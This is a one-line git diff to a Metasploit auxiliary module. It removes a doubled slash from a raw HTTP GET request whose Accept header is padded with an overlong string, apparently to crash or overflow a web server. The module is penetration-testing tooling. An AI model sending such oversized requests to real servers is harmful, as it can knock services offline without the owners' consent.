Another update

bug/bundler_fix
sinn3r 2013-12-06 14:53:35 -06:00
parent af16f11784
commit 9f5768ae37
1 changed files with 1 additions and 1 deletions

View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
uri = normalize_uri(datastore['URIPATH'])
http = ''
http << "GET /#{uri} HTTP/1.1\r\n"
http << "GET #{uri} HTTP/1.1\r\n"
http << "Host: #{host}\r\n"
http << "Accept: #{long_string}\r\n"
http << "\r\n"